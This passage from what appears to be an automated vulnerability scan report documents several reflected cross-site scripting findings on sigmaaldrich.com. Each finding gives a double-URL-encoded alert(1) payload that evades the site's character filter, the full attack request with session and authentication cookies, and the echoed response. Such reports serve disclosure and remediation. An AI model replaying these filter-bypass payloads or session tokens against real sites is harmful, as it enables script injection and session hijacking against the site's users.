Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:11 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography8a414";alert(1)//e5c2d52ef49/vials.html","E404") ;
   </script>
...[SNIP]...

1.34. http://www.sigmaaldrich.com/analytical-chromatography/vials.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/vials.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0007%2522%253balert%25281%2529%252f%252f9c4b8e8fae9 was submitted in the REST URL parameter 2. This input was echoed as b0007";alert(1)//9c4b8e8fae9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/b0007%2522%253balert%25281%2529%252f%252f9c4b8e8fae9 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:13 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/b0007";alert(1)//9c4b8e8fae9","E404") ;
   </script>
...[SNIP]...

1.35. http://www.sigmaaldrich.com/analytical-chromatography/video.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/video.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c481b%2522%253balert%25281%2529%252f%252f5d2237e005e was submitted in the REST URL parameter 1. This input was echoed as c481b";alert(1)//5d2237e005e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographyc481b%2522%253balert%25281%2529%252f%252f5d2237e005e/video.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographyc481b";alert(1)//5d2237e005e/video.html","E404") ;
   </script>
...[SNIP]...

1.36. http://www.sigmaaldrich.com/analytical-chromatography/video.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/video.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 875ec%2522%253balert%25281%2529%252f%252f656691d2482 was submitted in the REST URL parameter 2. This input was echoed as 875ec";alert(1)//656691d2482 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/875ec%2522%253balert%25281%2529%252f%252f656691d2482 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:14 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/875ec";alert(1)//656691d2482","E404") ;
   </script>
...[SNIP]...

1.37. http://www.sigmaaldrich.com/author/site-level/mobile.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /author/site-level/mobile.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 738a7%2522%253balert%25281%2529%252f%252fe6da8202b7b was submitted in the REST URL parameter 1. This input was echoed as 738a7";alert(1)//e6da8202b7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /author738a7%2522%253balert%25281%2529%252f%252fe6da8202b7b/site-level/mobile.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/author738a7";alert(1)//e6da8202b7b/site-level/mobile.html","E404") ;
   </script>
...[SNIP]...

1.38. http://www.sigmaaldrich.com/author/site-level/mobile.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /author/site-level/mobile.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 873ad%2522%253balert%25281%2529%252f%252f83dd3b63e22 was submitted in the REST URL parameter 2. This input was echoed as 873ad";alert(1)//83dd3b63e22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /author/site-level873ad%2522%253balert%25281%2529%252f%252f83dd3b63e22/mobile.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; 